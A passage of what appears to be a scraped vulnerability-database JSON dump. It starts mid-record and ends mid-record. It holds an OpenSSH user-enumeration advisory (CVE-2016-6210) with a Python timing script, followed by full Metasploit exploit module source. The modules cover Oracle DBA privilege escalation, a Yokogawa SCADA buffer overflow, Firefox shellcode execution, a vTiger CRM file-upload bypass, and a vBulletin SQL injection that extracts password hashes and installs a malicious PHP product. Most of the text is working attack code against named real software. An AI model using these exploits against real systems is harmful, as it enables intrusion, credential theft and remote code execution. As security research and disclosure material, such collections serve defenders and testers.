http://seclists.org/fulldisclosure/2016/Jul/51\r\n\r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n\r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. 
This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n\r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n\r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n\r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n\r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n\r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n\r\n(Valid users will result in higher total time).\r\n\r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n\r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n\r\nEddie Harari", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40113/"}], "metasploit": [{"lastseen": "2019-11-21T16:32:13", "bulletinFamily": "exploit", "description": "This 
module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.\n", "modified": "2018-12-10T17:21:16", "published": "2017-08-07T03:07:46", "id": "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "href": "", "type": "metasploit", "title": "Oracle DB Privilege Escalation via Function-Based Index", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.\n },\n 'Author' =>\n [\n 'David Litchfield', # Vulnerability discovery and exploit\n 'Moshe Kaplan', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],\n ],\n 'DisclosureDate' => 'Jan 21 2015'))\n\n register_options(\n [\n OptString.new('SQL', [ true, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\" ]),\n OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),\n ])\n end\n\n def run\n return unless check_dependencies\n\n func_name = Rex::Text.rand_text_alpha(6..10)\n\n create_function = <<-EOF\n CREATE OR REPLACE FUNCTION #{func_name}\n (FOO varchar) return varchar\n deterministic authid current_user is\n pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL'].gsub(\"'\", \"\\\\\\\\'\")}';\n commit;\n return '';\n end;\n EOF\n\n index_name = Rex::Text.rand_text_alpha(6..10)\n param_value = 
Rex::Text.rand_text_alpha(2..6)\n\n create_index = \"CREATE INDEX #{index_name} ON \" \\\n \"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))\"\n\n trigger = \"SELECT * FROM #{datastore['TABLE']}\"\n\n clean_index = \"drop index #{index_name}\"\n clean_func = \"drop function #{func_name}\"\n\n print_status('Running exploit...')\n\n begin\n print_status(\"Attempting to create function #{func_name}...\")\n prepare_exec(create_function)\n print_status(\"Attempting to create index #{index_name}...\")\n prepare_exec(create_index)\n print_status('Querying to trigger function...')\n prepare_exec(trigger)\n print_status('Cleaning up index...')\n prepare_exec(clean_index)\n print_status('Cleaning up function...')\n prepare_exec(clean_func)\n print_status('Exploit complete!')\n rescue ::OCIError => e\n print_error(\"Error! #{e.message}\")\n end\n end\n\n def prepare_exec(query)\n print_status(query)\n super\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/oracle_index_privesc.rb"}, {"lastseen": "2019-12-05T07:30:08", "bulletinFamily": "exploit", "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create logs using functions like vsprintf and memcpy in an insecure way. 
This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.\n", "modified": "2017-09-17T20:00:04", "published": "2014-07-07T16:20:49", "id": "MSF:EXPLOIT/WINDOWS/SCADA/YOKOGAWA_BKFSIM_VHFD", "href": "", "type": "metasploit", "title": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.\n },\n 'Author' =>\n [\n 'Redsadic <julian.vilas[at]gmail.com>',\n 'juan vazquez'\n ],\n 'References' =>\n [\n ['CVE', '2014-3888'],\n ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],\n ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']\n ],\n 'Payload' =>\n {\n 'Space' => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',\n {\n 'Ret' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll\n 'Offset' => 438\n }\n ],\n ],\n 'DisclosureDate' => 'May 23 2014',\n 
'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(20010)\n ])\n end\n\n def exploit\n connect_udp\n\n sploit = \"\\x45\\x54\\x56\\x48\\x01\\x01\\x10\\x09\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44\" # header\n sploit << rand_text(target['Offset'])\n sploit << [target.ret].pack(\"V\")\n sploit << payload.encoded\n\n print_status(\"Trying target #{target.name}, sending #{sploit.length} bytes...\")\n udp_sock.put(sploit)\n\n disconnect_udp\n end\nend\n\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb"}, {"lastseen": "2019-10-21T09:44:55", "bulletinFamily": "exploit", "description": "This module allows execution of native payloads from a privileged Firefox Javascript shell. It places the specified payload into memory, adds the necessary protection flags, and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-17T21:31:45", "id": "MSF:EXPLOIT/FIREFOX/LOCAL/EXEC_SHELLCODE", "href": "", "type": "metasploit", "title": "Firefox Exec Shellcode from Privileged Javascript Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/firefox'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking # Missing autodetection, but has widespread targetability\n\n include Msf::Payload::Firefox\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',\n 'Description' => %q{\n This module allows execution of native payloads from a privileged Firefox Javascript shell.\n It places the specified payload into memory, adds the necessary 
protection flags,\n and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter\n session without touching the disk.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'joev' ],\n 'Platform' => [ 'firefox' ],\n 'DisclosureDate' => 'Mar 10 2014',\n 'Targets' => [\n [\n 'Native Payload', {\n 'Platform' => %w{ linux osx win unix },\n 'Arch' => ARCH_ALL\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new('TIMEOUT', [true, \"Maximum time (seconds) to wait for a response\", 90])\n ])\n end\n\n def exploit\n print_status \"Running the Javascript shell...\"\n session.shell_write(\"[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]\")\n results = session.shell_read_until_token(\"[!JAVASCRIPT]\", 0, datastore['TIMEOUT'])\n print_warning(results) if results.present?\n end\n\n def js_payload\n %Q|\n (function(send){\n try {\n #{run_payload}\n send(\"Payload executed.\");\n } catch (e) {\n send(e);\n }\n })(send);\n |.strip\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/firefox/local/exec_shellcode.rb"}, {"lastseen": "2019-11-17T10:40:27", "bulletinFamily": "exploit", "description": "vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. 
This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.\n", "modified": "2017-09-08T01:18:50", "published": "2014-01-02T17:25:52", "id": "MSF:EXPLOIT/MULTI/HTTP/VTIGER_SOAP_UPLOAD", "href": "", "type": "metasploit", "title": "vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include REXML\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',\n 'Description' => %q{\n vTiger CRM allows a user to bypass authentication when requesting SOAP services.\n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. By combining both vulnerabilities an attacker can upload and execute PHP\n code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2.\n },\n 'Author' =>\n [\n 'Egidio Romano', # Vulnerability discovery\n 'juan vazquez' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-3214' ],\n [ 'CVE', '2013-3215' ],\n [ 'OSVDB', '95902' ],\n [ 'OSVDB', '95903' ],\n [ 'BID', '61558' ],\n [ 'BID', '61559' ],\n [ 'EDB', '27279' ],\n [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],\n [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Payload' =>\n {\n # Arbitrary big number. 
The payload is sent base64 encoded\n # into a POST SOAP request\n 'Space' => 262144, # 256k\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'vTigerCRM v5.4.0', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 26 2013'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base vTiger CRM directory path\", '/vtigercrm/'])\n ])\n end\n\n def check\n test_one = check_email_soap(\"admin\", rand_text_alpha(4 + rand(4)))\n res = send_soap_request(test_one)\n\n unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil=\"true\" xsi:type=\"xsd:string\"\\/>/\n return Exploit::CheckCode::Unknown\n end\n\n test_two = check_email_soap(\"admin\")\n res = send_soap_request(test_two)\n\n if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type=\"xsd:string\">.*<\\/return>/)\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n file_name = rand_text_alpha(rand(10)+6) + '.php'\n php = %Q|<?php #{payload.encoded} ?>|\n\n soap = add_attachment_soap(file_name, php)\n res = send_soap_request(soap)\n\n print_status(\"Uploading payload...\")\n if res and res.code == 200 and res.body.to_s =~ /<return xsi:type=\"xsd:string\">.*<\\/return>/\n print_good(\"Upload successfully uploaded\")\n register_files_for_cleanup(file_name)\n else\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n print_status(\"Executing payload...\")\n send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)\n end\n\n def add_attachment_soap(file_name, file_data)\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n 'xmlns:xsi' => \"http://www.w3.org/2001/XMLSchema-instance\",\n 'xmlns:xsd' => \"http://www.w3.org/2001/XMLSchema\",\n 'xmlns:soapenv' => \"http://schemas.xmlsoap.org/soap/envelope/\",\n 'xmlns:crm' => \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = 
xml.root.elements[2]\n body.add_element(\n \"crm:AddEmailAttachment\",\n {\n 'soapenv:encodingStyle' => \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"emailid\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filedata\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filename\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filesize\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"filetype\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"username\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"session\", {'xsi:type' => 'xsd:string'})\n crm.elements['emailid'].text = rand_text_alpha(4+rand(4))\n crm.elements['filedata'].text = \"MSF_PAYLOAD\"\n crm.elements['filename'].text = \"MSF_FILENAME\"\n crm.elements['filesize'].text = file_data.length.to_s\n crm.elements['filetype'].text = \"php\"\n crm.elements['username'].text = rand_text_alpha(4+rand(4))\n\n xml_string = xml.to_s\n xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))\n xml_string.gsub!(/MSF_FILENAME/, \"../../../../../../#{file_name}\")\n\n return xml_string\n end\n\n def check_email_soap(user_name = \"\", session = \"\")\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n 'xmlns:xsi' => \"http://www.w3.org/2001/XMLSchema-instance\",\n 'xmlns:xsd' => \"http://www.w3.org/2001/XMLSchema\",\n 'xmlns:soapenv' => \"http://schemas.xmlsoap.org/soap/envelope/\",\n 'xmlns:crm' => \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:CheckEmailPermission\",\n {\n 'soapenv:encodingStyle' => \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"username\", {'xsi:type' => 'xsd:string'})\n crm.add_element(\"session\", {'xsi:type' => 'xsd:string'})\n crm.elements['username'].text = user_name\n crm.elements['session'].text = session\n\n xml.to_s\n 
end\n\n def send_soap_request(soap_data)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'vtigerservice.php'),\n 'method' => 'POST',\n 'vars_get' => { 'service' => 'outlook' },\n 'ctype' => 'text/xml; charset=UTF-8',\n 'data' => soap_data\n })\n\n return res\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_soap_upload.rb"}, {"lastseen": "2019-10-09T01:53:57", "bulletinFamily": "exploit", "description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module uses the sqli to extract the web application's usernames and hashes. With the retrieved information tries to log into the admin control panel in order to deploy the PHP payload. This module has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu Linux distribution.\n", "modified": "2017-07-24T13:26:21", "published": "2013-12-06T19:50:12", "id": "MSF:EXPLOIT/UNIX/WEBAPP/VBULLETIN_VOTE_SQLI_EXEC", "href": "", "type": "metasploit", "title": "vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',\n 'Description' => %q{\n This module exploits a SQL injection vulnerability found in vBulletin 5 that has\n been used in the wild since March 2013. This module uses the sqli to extract the\n web application's usernames and hashes. With the retrieved information tries to\n log into the admin control panel in order to deploy the PHP payload. 
This module\n has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu\n Linux distribution.\n },\n 'Author' =>\n [\n 'Orestis Kourides', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-3522' ],\n [ 'OSVDB', '92031' ],\n [ 'EDB', '24882' ],\n [ 'BID', '58754' ],\n [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 10000 # Just value big enough to fit any php payload\n },\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],\n 'DisclosureDate' => 'Mar 25 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The path to vBulletin', '/']),\n OptInt.new(\"NODE\", [false, 'Valid Node ID']),\n OptInt.new(\"MINNODE\", [true, 'Valid Node ID', 1]),\n OptInt.new(\"MAXNODE\", [true, 'Valid Node ID', 100])\n ])\n end\n\n def exists_node?(id)\n mark = rand_text_alpha(8 + rand(5))\n result = do_sqli(id, \"select '#{mark}'\")\n\n if result and result =~ /#{mark}/\n return true\n end\n\n return false\n end\n\n def brute_force_node\n min = datastore[\"MINNODE\"]\n max = datastore[\"MAXNODE\"]\n\n if min > max\n print_error(\"MINNODE can't be major than MAXNODE\")\n return nil\n end\n\n for node_id in min..max\n if exists_node?(node_id)\n return node_id\n end\n end\n\n return nil\n end\n\n def get_node\n if datastore['NODE'].nil? 
or datastore['NODE'] <= 0\n print_status(\"Brute forcing to find a valid node id...\")\n return brute_force_node\n end\n\n print_status(\"Checking node id #{datastore['NODE']}...\")\n if exists_node?(datastore['NODE'])\n return datastore['NODE']\n else\n return nil\n end\n end\n\n def do_sqli(node, query)\n mark = Rex::Text.rand_text_alpha(5 + rand(3))\n random_and = Rex::Text.rand_text_numeric(4)\n injection = \") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) \"\n injection << \"from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) \"\n injection << \"AND (#{random_and}=#{random_and}\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"ajax\", \"api\", \"reputation\", \"vote\"),\n 'vars_post' =>\n {\n 'nodeid' => \"#{node}#{injection}\",\n }\n })\n\n unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/\n return nil\n end\n\n data = \"\"\n\n if res.body.to_s =~ /#{mark}(.*)#{mark}/\n data = $1\n end\n\n return data\n end\n\n def get_user_data(node_id, user_id)\n user = do_sqli(node_id, \"select username from user limit #{user_id},#{user_id+1}\")\n pass = do_sqli(node_id, \"select password from user limit #{user_id},#{user_id+1}\")\n salt = do_sqli(node_id, \"select salt from user limit #{user_id},#{user_id+1}\")\n\n return [user, pass, salt]\n end\n\n def do_login(user, hash)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"login.php\"),\n 'method' => 'POST',\n 'encode_params' => false,\n 'vars_get' => {\n 'do' => 'login'\n },\n 'vars_post' => {\n 'url' => '%2Fadmincp%2F',\n 'securitytoken' => 'guest',\n 'logintype' => 'cplogin',\n 'do' => 'login',\n 'vb_login_md5password' => hash,\n 'vb_login_md5password_utf' => hash,\n 'vb_login_username' => user,\n 'vb_login_password' => '',\n 'cssprefs' => ''\n }\n })\n\n if res and res.code == 200 and 
res.body and res.body.to_s =~ /window\\.location.*admincp/ and !res.get_cookies.empty?\n session = res.get_cookies\n else\n return nil\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"/\"),\n 'cookie' => session\n })\n\n if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\\/title>/\n return session\n else\n return nil\n end\n\n end\n\n def get_token(response)\n token_info = {\n :session_hash => \"\",\n :security_token => \"\",\n :admin_hash => \"\"\n }\n\n if response =~ /var SESSIONHASH = \"([0-9a-f]+)\";/\n token_info[:session_hash] = $1\n end\n\n if response =~ /var ADMINHASH = \"([0-9a-f]+)\";/\n token_info[:admin_hash] = $1\n end\n\n if response =~ /var SECURITYTOKEN = \"([0-9a-f\\-]+)\";/\n token_info[:security_token] = $1\n end\n\n return token_info\n end\n\n def get_install_token\n res = send_request_cgi({\n \"uri\" => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n \"vars_get\" => {\n \"do\" => \"productadd\"\n },\n \"cookie\" => @session\n })\n\n unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/\n return nil\n end\n\n\n return get_token(res.body.to_s)\n end\n\n def install_product(token_info)\n\n xml_product = <<-EOF\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n\n<product productid=\"#{@product_id}\" active=\"0\">\n <title>#{@product_id}</title>\n <description>#{@product_id}</description>\n <version>1.0</version>\n <url>http://#{@product_id}.loc</url>\n <versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>\n <dependencies>\n <dependency dependencytype=\"vbulletin\" minversion=\"\" maxversion=\"\" />\n </dependencies>\n <codes>\n <code version=\"*\">\n <installcode>\n <![CDATA[\n #{payload.encoded}\n ]]>\n </installcode>\n <uninstallcode />\n </code>\n </codes>\n <templates>\n </templates>\n <stylevardfns>\n </stylevardfns>\n <stylevars>\n </stylevars>\n <hooks>\n </hooks>\n <phrases>\n </phrases>\n <options>\n 
</options>\n <helptopics>\n </helptopics>\n <cronentries>\n </cronentries>\n <faqentries>\n </faqentries>\n <widgets>\n </widgets>\n</product>\n EOF\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(token_info[:session_hash], nil, nil, \"form-data; name=\\\"s\\\"\")\n post_data.add_part(\"productimport\", nil, nil, \"form-data; name=\\\"do\\\"\")\n post_data.add_part(token_info[:admin_hash], nil, nil, \"form-data; name=\\\"adminhash\\\"\")\n post_data.add_part(token_info[:security_token], nil, nil, \"form-data; name=\\\"securitytoken\\\"\")\n post_data.add_part(xml_product, \"text/xml\", nil, \"form-data; name=\\\"productfile\\\"; filename=\\\"product_juan2.xml\\\"\")\n post_data.add_part(\"\", nil, nil, \"form-data; name=\\\"serverfile\\\"\")\n post_data.add_part(\"1\", nil, nil, \"form-data; name=\\\"allowoverwrite\\\"\")\n post_data.add_part(\"999999999\", nil, nil, \"form-data; name=\\\"MAX_FILE_SIZE\\\"\")\n\n data = post_data.to_s\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n 'method' => \"POST\",\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productimport\"\n },\n 'data' => data\n })\n\n if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/\n return true\n elsif res\n fail_with(Failure::Unknown, \"#{peer} - Error when trying to install the product.\")\n else\n return false\n end\n\n end\n\n def get_delete_token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"admincp\", \"product.php\"),\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productdelete\",\n \"productid\" => @product_id,\n \"s\" => @session_hash\n }\n })\n\n if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/\n return get_token(res.body.to_s)\n end\n\n return nil\n end\n\n def delete_product(token_info)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 
\"admincp\", \"product.php\"),\n 'method' => \"POST\",\n 'cookie' => @session,\n 'vars_get' => {\n \"do\" => \"productkill\"\n },\n 'vars_post' => {\n \"s\" => token_info[:session_hash],\n \"do\" => \"productkill\",\n \"adminhash\" => token_info[:admin_hash],\n \"securitytoken\" => token_info[:security_token],\n \"productid\" => @product_id\n }\n })\n\n if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/\n return true\n end\n\n return false\n end\n\n def check\n node_id = get_node\n\n unless node_id.nil?\n return Msf::Exploit::CheckCode::Appears\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"index.php\")\n })\n\n if res and res.code == 200 and res.body.to_s =~ /\"simpleversion\": \"v=5/\n return Msf::Exploit::CheckCode::Appears\n end\n\n return Msf::Exploit::CheckCode::Safe\n end\n\n def on_new_session(session)\n print_status(\"Getting the uninstall token info...\")\n delete_token = get_delete_token\n if delete_token.nil?\n print_error(\"Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...\")\n return\n end\n\n print_status(\"Deleting the product #{@product_id}...\")\n if delete_product(delete_token)\n print_good(\"Product #{@product_id} deleted\")\n else\n print_error(\"Failed uninstall the product #{@product_id}, should be done manually...\")\n end\n end\n\n def exploit\n print_status(\"Checking for a valid node id...\")\n node_id = get_node\n if node_id.nil?\n print_error(\"node id not found\")\n return\n end\n\n print_good(\"Using node id #{node_id} to exploit sqli... 
Counting users...\")\n data = do_sqli(node_id, \"select count(*) from user\")\n if data.empty?\n print_error(\"Error exploiting sqli\")\n return\n end\n count_users = data.to_i\n users = []\n print_good(\"#{count_users} users found\")\n\n for i in 0..count_users - 1\n user = get_user_data(node_id, i)\n connection_details = {\n module_fullname: self.fullname,\n username: user[0],\n private_data: user[1],\n private_type: :nonreplayable_hash,\n jtr_format: 'md5,raw-md5',\n proof: \"salt: #{user[2]}\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n # why is this stored another way?\n report_auth_info({\n :host => rhost,\n :port => rport,\n :user => user[0],\n :pass => user[1],\n :type => \"hash\",\n :sname => (ssl ? \"https\" : \"http\"),\n :proof => \"salt: #{user[2]}\" # Using proof to store the hash salt\n })\n users << user\n end\n\n @session = nil\n users.each do |user|\n print_status(\"Trying to log into vBulletin admin control panel as #{user[0]}...\")\n @session = do_login(user[0], user[1])\n unless @session.blank?\n print_good(\"Logged in successfully as #{user[0]}\")\n break\n end\n end\n\n if @session.blank?\n fail_with(Failure::NoAccess, \"#{peer} - Failed to log into the vBulletin admin control panel\")\n end\n\n print_status(\"Getting the install product security token...\")\n install_token = get_install_token\n if install_token.nil?\n fail_with(Failure::Unknown, \"#{peer} - Failed to get the install token\")\n end\n\n @session_hash = install_token[:session_hash]\n @product_id = rand_text_alpha_lower(5 + rand(8))\n print_status(\"Installing the malicious product #{@product_id}...\")\n if install_product(install_token)\n print_good(\"Product successfully installed... payload should be executed...\")\n else\n # Two situations trigger this path:\n # 1) Upload failed but there wasn't answer from the server. 
I don't think it's going to happen often.\n # 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.\n # Because of that fail_with isn't used here.\n return\n end\n\n print_status(\"Getting the uninstall token info...\")\n delete_token = get_delete_token\n if delete_token.nil?\n print_error(\"Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...\")\n return\n end\n\n print_status(\"Deleting the product #{@product_id}...\")\n if delete_product(delete_token)\n print_good(\"Product #{@product_id} deleted\")\n else\n print_error(\"Failed uninstall the product #{@product_id}, should be done manually...\")\n end\n\n end\n\n\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb"}, {"lastseen": "2019-11-23T06:45:46", "bulletinFamily": "exploit", "description": "This 